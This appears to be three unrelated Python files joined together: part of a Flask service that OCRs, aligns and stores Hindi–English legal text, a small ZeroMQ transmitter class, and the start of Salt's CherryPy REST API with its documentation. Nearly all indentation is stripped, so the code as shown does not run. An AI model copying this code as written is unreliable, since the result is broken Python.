app.config['UPLOAD_FOLDER'], basename + '.pdf')
# translationProcess = TranslationProcess(
# status=STATUS_PROCESSING, name=f.filename, created_on=current_time, basename=basename)
# translationProcess.save()
f.save(filepath)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, '_eng'), callback=capturetext)
pool.close()
pool.join()
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt')
processenglish(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_filtered.txt')
# translatewithanuvadaeng(app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_hin_filtered.txt', app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_eng_tran.txt')
# f_eng = open(app.config['UPLOAD_FOLDER']+'/' +
# basename + '_eng_filtered.txt', 'r')
english_res = []
# hindi_res = []
# for f in f_eng:
# english_res.append(f)
# f_eng.close()
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' +
basename + '_eng_filtered.txt', 'r')
for f in f_eng:
english_res.append(f)
f_eng.close()
data = {'english': english_res}
# translations = []
# for i in range(0, len(hindi_res)):
# translation = Translation(basename=str(
# basename), source=hindi_res[i], target=english_res[i])
# translations.append(translation)
# Translation.objects.insert(translations)
res = CustomResponse(Status.SUCCESS.value, data)
result = flask.send_file(os.path.join('upload/', basename + '_eng_filtered.txt'), as_attachment=True)
result.headers["x-suggested-filename"] = basename + '.txt'
# translationProcess = TranslationProcess.objects(basename=basename)
# translationProcess.update(set__status=STATUS_PROCESSED)
return result
@app.route('/translate', methods=['POST'])
def translate():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
f = request.files['file']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '.pdf')
translationProcess = TranslationProcess(
status=STATUS_PROCESSING, name=f.filename, created_on=current_time, basename=basename)
translationProcess.save()
f.save(filepath)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, '_hin'), callback=capturetext)
pool.close()
pool.join()
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin_filtered.txt')
processenglish(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt')
translatewithanuvadaeng(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt', app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_tran.txt')
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' +
basename + '_eng_tran.txt', 'r')
english_res = []
hindi_res = []
for f in f_eng:
english_res.append(f)
f_eng.close()
f_hin = open(app.config['UPLOAD_FOLDER'] + '/' +
basename + '_hin_filtered.txt', 'r')
for f in f_hin:
hindi_res.append(f)
f_hin.close()
data = {'hindi': hindi_res, 'english': english_res}
translations = []
for i in range(0, len(hindi_res)):
translation = Translation(basename=str(
basename), source=hindi_res[i], target=english_res[i])
translations.append(translation)
Translation.objects.insert(translations)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = CustomResponse(Status.SUCCESS.value, data)
translationProcess = TranslationProcess.objects(basename=basename)
translationProcess.update(set__status=STATUS_PROCESSED)
return res.getres()
@app.route('/batch-sentences', methods=['GET'])
def batchsentences():
basename = request.args.get('basename')
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
sentences = Sentence.objects(basename=basename)
corpus_obj = Corpus.objects(basename=basename)
index = 2
batch_size = 10000
if len(sentences) > batch_size:
for i in range(2, 1 + math.ceil(len(sentences) / batch_size)):
base = str(uuid.uuid4())
if (i) * batch_size > len(sentences):
sentence_batch = sentences[0:(i - 1) * batch_size - len(sentences)]
print(len(sentence_batch))
if len(sentence_batch) > 0:
corpus = Corpus(source_lang='English', target_lang='Hindi', status=STATUS_PROCESSED,
name='SC Judgment 2019 Batch ' + str(index), domain='LAW', created_on=current_time,
last_modified=current_time, author='', comment='',
no_of_sentences=len(sentence_batch),
basename=base)
corpus.save()
for sentence in sentence_batch:
sentence_dict = json.loads(sentence.to_json())
sen = Sentence.objects(_id=sentence_dict['_id']['$oid'])
print(sen.to_json())
sen.update(set__basename=base)
else:
sentence_batch = sentences[0:batch_size]
print(len(sentence_batch))
if len(sentence_batch) > 0:
corpus = Corpus(source_lang='English', target_lang='Hindi', status=STATUS_PROCESSED,
name='SC Judgment 2019 Batch ' + str(index), domain='LAW', created_on=current_time,
last_modified=current_time, author='', comment='',
no_of_sentences=len(sentence_batch),
basename=base)
corpus.save()
for sentence in sentence_batch:
sentence_dict = json.loads(sentence.to_json())
sen = Sentence.objects(_id=sentence_dict['_id']['$oid'])
print(sen.to_json())
sen.update(set__basename=base)
index += 1
res = CustomResponse(Status.FAILURE.value, basename)
return res.getres()
@app.route('/remove-process', methods=['POST'])
def delete_process():
log.info('delete_process: started at ' + str(getcurrenttime()))
try:
basename = request.form.getlist('processname')[0]
        log.info('delete_process : requested basename is : ' + basename)
translationProcess = TranslationProcess.objects(basename=basename).delete()
log.info('delete_process: ended at ' + str(getcurrenttime()))
res = CustomResponse(Status.SUCCESS.value, basename)
except:
        log.info('delete_process : ERROR while processing basename : ' + basename)
res = CustomResponse(Status.FAILURE.value, basename)
return res.getres()
@app.route('/single', methods=['POST'])
def upload_single_file():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
corpus = Corpus(status=STATUS_PROCESSING, name=str(basename), domain='', created_on=current_time,
last_modified=current_time, author='', comment='', no_of_sentences=0)
corpus.save()
f = request.files['file']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '.pdf')
f.save(filepath)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, ''), callback=capturetext)
pool.close()
pool.join()
separate(app.config['UPLOAD_FOLDER'] + '/' + basename)
return process_files(basename)
@app.route('/multiple-law', methods=['POST'])
def upload_file_law():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
try:
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
f = request.files['hindi']
f_eng = request.files['english']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_hin.pdf')
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_eng.pdf')
f.save(filepath)
f_eng.save(filepath_eng)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, '_hin'), callback=capturetext)
pool.apply_async(converttoimage, args=(
filepath_eng, app.config['UPLOAD_FOLDER'], basename, '_eng'), callback=capturetext)
pool.close()
pool.join()
return process_files_law(basename, 'OLD_LAW_CORPUS')
except Exception as e:
print(e)
res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, None)
return res.getres(), Status.ERR_GLOBAL_SYSTEM.value['http']['status']
def process_files_law(basename, name):
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin_filtered.txt')
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt')
processhindi(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt')
processenglish(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_filtered.txt')
translatewithgoogle(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt', app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_tran.txt')
os.system(
'./helpers/bleualign.py -s ' + os.getcwd() + '/upload/' + basename + '_hin_filtered' + '.txt' + ' -t ' + os.getcwd() + '/upload/' + basename +
'_eng_filtered' + '.txt' + ' --srctotarget ' + os.getcwd() + '/upload/' + basename + '_eng_tran' + '.txt' + ' -o ' + os.getcwd() + '/upload/' + basename + '_output')
english_res = []
hindi_res = []
english_points = []
english_points_words = []
hindi_points = []
hindi_points_words = []
f_eng = open(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_output-t', 'r')
for f in f_eng:
english_res.append(f)
point = fetchwordsfromsentence(f, basename)
english_points.append(point['avg'])
english_points_words.append(point['values'])
f_eng.close()
f_hin = open(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_output-s', 'r')
for f in f_hin:
hindi_res.append(f)
point = fetchwordsfromsentence(f, basename)
hindi_points.append(point['avg'])
hindi_points_words.append(point['values'])
f_hin.close()
data = {'hindi': hindi_res, 'english': english_res,
'english_scores': english_points, 'hindi_scores': hindi_points}
sentences = []
for i in range(0, len(hindi_res)):
sentence = Sentence(status=STATUS_PENDING, alignment_accuracy=english_res[i].split(':::::')[1], basename=name,
source=hindi_res[i], target=english_res[i].split(':::::')[0],
source_ocr_words=hindi_points_words[i], source_ocr=str(hindi_points[i]),
target_ocr_words=english_points_words[i], target_ocr=str(english_points[i]))
sentences.append(sentence)
# sentence.save()
Sentence.objects.insert(sentences)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = CustomResponse(Status.SUCCESS.value, data)
# corpus = Corpus.objects(basename=basename)
# corpus.update(set__status=STATUS_PROCESSED,
# set__no_of_sentences=len(hindi_res))
return res.getres()
@app.route('/remove-junk', methods=['POST'])
def remove_junk():
basename = str(int(time.time()))
f = request.files['file']
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_junk.txt')
f.save(filepath_eng)
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_junk.txt', 'r')
for t in f_eng:
Sentence.objects(source=t).delete()
res = CustomResponse(Status.SUCCESS.value, None)
return res.getres()
@app.route('/save-benchmark', methods=['POST'])
def upload_benchmark_file():
basename = str(int(time.time()))
    assign_to = ''
    if request.headers.get('ad-userid') is not None:
        assign_to = request.headers.get('ad-userid')
try:
name = request.form.getlist('name')
source_lang = request.form.getlist('source_lang')
if source_lang is None or len(
source_lang) == 0 or len(source_lang[0]) == 0 or name is None or len(name) == 0 or len(
name[0]) == 0 or request.files is None or \
request.files['file'] is None:
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
else:
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
corpus = Benchmark(source_lang=source_lang[0], status=STATUS_PROCESSING,
name=name[0], created_on=current_time,assigned_to=request.headers.get('ad-userid'),
last_modified=current_time, author='', no_of_sentences=0,
basename=basename)
corpus.save()
f_eng = request.files['file']
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_eng_filtered.txt')
f_eng.save(filepath_eng)
# f = request.files['hindi']
# filepath = os.path.join(
# app.config['UPLOAD_FOLDER'], basename + '_hin_filtered.txt')
# f.save(filepath)
# translatewithanuvadaeng(app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_eng_filtered.txt', app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_hin_filtered.txt', model_id[0])
# target_lang = LANGUAGES[target_lang[0]]
# translatewithgoogle(app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_eng_filtered.txt', app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_hin_filtered.txt', target_lang)
# os.system('./helpers/bleualign.py -s ' + os.getcwd() + '/upload/' + basename + '_hin_filtered' + '.txt' + ' -t ' + os.getcwd() + '/upload/' + basename +
# '_eng_filtered' + '.txt' + ' --srctotarget ' + os.getcwd() + '/upload/' + basename + '_eng_tran' + '.txt' + ' -o ' + os.getcwd() + '/upload/' + basename + '_output')
english_res = []
# f_eng = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt', 'r')
error = False
error_messages = 'Error came for Sentences'
with open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt', 'rb') as f:
# for f in f_eng:
flist = f.readlines()
index = 1
for f_data in flist:
try:
if f_data.decode("utf8") != '\n' and len(f_data.decode("utf8")) > 0:
index = index + 1
english_res.append(f_data.decode("utf8"))
except Exception as e:
error = True
error_messages = error_messages +' '+str(index)
index = index + 1
# f_eng.close()
data = {'english': english_res}
sentences = []
for i in range(0, len(english_res)):
sentence = Sentence(sentenceid=str(uuid.uuid4()), status=STATUS_PENDING, basename=str(
basename), source=english_res[i])
try:
sentence.save()
except Exception as e:
error = True
error_messages = error_messages+' '+english_res[i]
# sentences.append(sentence)
# sentence.save()
# Sentence.objects.insert(sentences)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = None
log.info(error)
if error:
res = {}
res = Status.ERR_GLOBAL_SYSTEM.value
res['why'] = error_messages
# res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, error_messages)
return jsonify(res),500
else:
res = CustomResponse(Status.SUCCESS.value, data)
corpus = Benchmark.objects(basename=basename)
corpus.update(set__status=STATUS_PROCESSED,
set__no_of_sentences=len(english_res))
return res.getres()
except Exception as e:
print(e)
res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, None)
return res.getres(), Status.ERR_GLOBAL_SYSTEM.value['http']['status']
@app.route('/indian-kanoon', methods=['POST'])
def upload_indian_kannon_file():
basename = str(int(time.time()))
try:
name = request.form.getlist('name')
domain = request.form.getlist('domain')
source_lang = request.form.getlist('source_lang')
target_lang = request.form.getlist('target_lang')
model_id = request.form.getlist('model_id')
comment = request.form.getlist('comment')
if comment is None or len(comment) == 0:
comment = ['']
if target_lang is None or len(target_lang) == 0 or len(target_lang[0]) == 0 or source_lang is None or len(
source_lang) == 0 or len(source_lang[0]) == 0 or name is None or len(name) == 0 or len(
name[0]) == 0 or domain is None or len(domain) == 0 or len(domain[0]) == 0 or request.files is None or \
request.files['english'] is None:
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
else:
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
corpus = Corpus(source_lang=source_lang[0], target_lang=target_lang[0], status=STATUS_PROCESSING,
name=name[0], domain=domain[0], created_on=current_time,
last_modified=current_time, author='', comment=comment[0], no_of_sentences=0,
basename=basename)
corpus.save()
f_eng = request.files['english']
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_eng_filtered.txt')
f_eng.save(filepath_eng)
# f = request.files['hindi']
# filepath = os.path.join(
# app.config['UPLOAD_FOLDER'], basename + '_hin_filtered.txt')
# f.save(filepath)
translatewithanuvadaeng(app.config['UPLOAD_FOLDER'] +
'/'+basename+'_eng_filtered.txt', app.config['UPLOAD_FOLDER'] +
'/'+basename+'_hin_filtered.txt', model_id[0])
# target_lang = LANGUAGES[target_lang[0]]
# translatewithgoogle(app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_eng_filtered.txt', app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_hin_filtered.txt', target_lang)
# os.system('./helpers/bleualign.py -s ' + os.getcwd() + '/upload/' + basename + '_hin_filtered' + '.txt' + ' -t ' + os.getcwd() + '/upload/' + basename +
# '_eng_filtered' + '.txt' + ' --srctotarget ' + os.getcwd() + '/upload/' + basename + '_eng_tran' + '.txt' + ' -o ' + os.getcwd() + '/upload/' + basename + '_output')
english_res = []
hindi_res = []
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt', 'r')
for f in f_eng:
english_res.append(f)
f_eng.close()
f_hin = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin_filtered.txt', 'r')
for f in f_hin:
hindi_res.append(f)
f_hin.close()
data = {'hindi': hindi_res, 'english': english_res}
sentences = []
for i in range(0, len(hindi_res)):
sentence = Sentence(sentenceid=str(uuid.uuid4()), status=STATUS_PENDING, basename=str(
basename), source=english_res[i], target=hindi_res[i])
sentences.append(sentence)
# sentence.save()
Sentence.objects.insert(sentences)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = CustomResponse(Status.SUCCESS.value, data)
corpus = Corpus.objects(basename=basename)
corpus.update(set__status=STATUS_PROCESSED,
set__no_of_sentences=len(hindi_res))
return res.getres()
except Exception as e:
print(e)
res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, None)
return res.getres(), Status.ERR_GLOBAL_SYSTEM.value['http']['status']
@app.route('/multiple', methods=['POST'])
def upload_file():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
try:
name = request.form.getlist('name')
domain = request.form.getlist('domain')
source_lang = request.form.getlist('source_lang')
target_lang = request.form.getlist('target_lang')
comment = request.form.getlist('comment')
if comment is None or len(comment) == 0:
comment = ['']
if name is None or len(name) == 0 or len(name[0]) == 0 or domain is None or len(domain) == 0 or len(
domain[0]) == 0 or request.files is None or request.files['hindi'] is None or request.files[
'english'] is None:
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
else:
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
corpus = Corpus(status=STATUS_PROCESSING, name=name[0], domain=domain[0], created_on=current_time,source_lang=source_lang[0],target_lang=target_lang[0],
last_modified=current_time, author='', comment=comment[0], no_of_sentences=0,
basename=basename)
corpus.save()
f = request.files['hindi']
f_eng = request.files['english']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_hin.pdf')
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_eng.pdf')
f.save(filepath)
f_eng.save(filepath_eng)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, '_hin'), callback=capturetext)
pool.apply_async(converttoimage, args=(
filepath_eng, app.config['UPLOAD_FOLDER'], basename, '_eng'), callback=capturetext)
pool.close()
pool.join()
return process_files(basename)
except Exception as e:
print(e)
res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, None)
return res.getres(), Status.ERR_GLOBAL_SYSTEM.value['http']['status']
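def _demo_upload_multiple(base_url='http://localhost:5001'):
    # Hypothetical client sketch for the /multiple route above: posts a
    # Hindi/English PDF pair with the form fields the handler reads. Assumes
    # `requests` is installed and that the two sample paths exist locally.
    import requests
    with open('sample_hin.pdf', 'rb') as f_hin, open('sample_eng.pdf', 'rb') as f_eng:
        files = {'hindi': f_hin, 'english': f_eng}
        data = {'name': 'Sample corpus', 'domain': 'LAW',
                'source_lang': 'Hindi', 'target_lang': 'English', 'comment': ''}
        resp = requests.post(base_url + '/multiple', files=files, data=data)
    return resp.json()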
def process_files(basename):
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin_filtered.txt')
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt')
processhindi(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt')
processenglish(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_filtered.txt')
translatewithgoogle(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt', app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_tran.txt')
os.system(
'./helpers/bleualign.py -s ' + os.getcwd() + '/upload/' + basename + '_hin_filtered' + '.txt' + ' -t ' + os.getcwd() + '/upload/' + basename +
'_eng_filtered' + '.txt' + ' --srctotarget ' + os.getcwd() + '/upload/' + basename + '_eng_tran' + '.txt' + ' -o ' + os.getcwd() + '/upload/' + basename + '_output')
english_res = []
hindi_res = []
english_points = []
english_points_words = []
hindi_points = []
hindi_points_words = []
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_output-t', 'r')
for f in f_eng:
english_res.append(f)
point = fetchwordsfromsentence(f, basename)
english_points.append(point['avg'])
english_points_words.append(point['values'])
f_eng.close()
f_hin = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_output-s', 'r')
for f in f_hin:
hindi_res.append(f)
point = fetchwordsfromsentence(f, basename)
hindi_points.append(point['avg'])
hindi_points_words.append(point['values'])
f_hin.close()
data = {'hindi': hindi_res, 'english': english_res,
'english_scores': english_points, 'hindi_scores': hindi_points}
sentences = []
for i in range(0, len(hindi_res)):
sentence = Sentence(status=STATUS_PENDING, alignment_accuracy=english_res[i].split(':::::')[1], basename=str(
basename), source=hindi_res[i], target=english_res[i].split(':::::')[0],
source_ocr_words=hindi_points_words[i], source_ocr=str(hindi_points[i]),
target_ocr_words=english_points_words[i], target_ocr=str(english_points[i]))
sentences.append(sentence)
# sentence.save()
Sentence.objects.insert(sentences)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = CustomResponse(Status.SUCCESS.value, data)
corpus = Corpus.objects(basename=basename)
corpus.update(set__status=STATUS_PROCESSED,
set__no_of_sentences=len(hindi_res))
return res.getres()
def capturewords(result):
print(result)
global words
words.append(result)
def capturetext(result):
words = convertimagetotext(result['imagenames'], app.config['UPLOAD_FOLDER'] +
'/' + result['basename'] + result['suffix'] + '.txt', result['basename'])
savewords(words)
def capturealtotext(result):
convertimagetoalto(result['imagenames'], app.config['UPLOAD_FOLDER'] +
'/' + result['basename'] + result['suffix'], result['basename'])
removetext(result['imagenames'], app.config['UPLOAD_FOLDER'] +
'/' + result['basename'] + result['suffix'])
translateandupdateimage(result['imagenames'], app.config['UPLOAD_FOLDER'] +
'/' + result['basename'] + result['suffix'])
converttopdf(result['imagenames'])
def getcurrenttime():
return int(round(time.time() * 1000))
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5001)
|
Transmitter.py
|
import os, sys
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
import threading
import time
from Communication_220114.Modules.Transmit import TransmitZMQ
tzo = TransmitZMQ.get_instance()
# tzo = TransmitZMQ.get_instance(port="5456")
from Communication_220114.Modules.Infrared_transmit import InfraredTransmit
from Communication_220114.Modules.Time_transmit import TimeTransmit
from Communication_220114.Modules.Variables import *
class Transmitter(object):
def __init__(self, mode="online"):
self.ir_trans = InfraredTransmit(mode=mode)
self.time_trans = TimeTransmit(topic=pose_topic)
def start_IR(self):
t1 = threading.Thread(target=self.ir_trans.start)
t1.start()
def start_Timer(self):
# t1 = threading.Thread(target=self.time_trans.start)
# t1.start()
self.time_trans.start(use_thread=True)
def single_send(self, topic, msg):
tzo.send(topic, msg)
if __name__ == "__main__":
transmitterObj = Transmitter(mode="offline")
transmitterObj.start_Timer()
# while True:
# transmitterObj.single_send(sl_topic, "this is a sound location")
# time.sleep(1)
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends: - CherryPy Python module (strongly recommend 3.2.x versions due to
an as yet unknown SSL error).
:optdepends: - ws4py Python module for websockets support.
:configuration: All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file
and restart the ``salt-master`` and ``salt-api`` daemons:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution function.
Running this function requires pyOpenSSL and the ``salt-call`` script is
available in the ``salt-minion`` package.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent
requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \
-H 'Accept: application/x-yaml' \
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\
-d client=local \
-d tgt='*' \
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \
-c ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d username=saltdev \
-d password=saltdev \
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \
-b ~/cookies.txt \
-H 'Accept: application/x-yaml' \
-d client=local \
-d tgt='*' \
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
import cherrypy
from cherrypy.lib import cpstats
import yaml
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
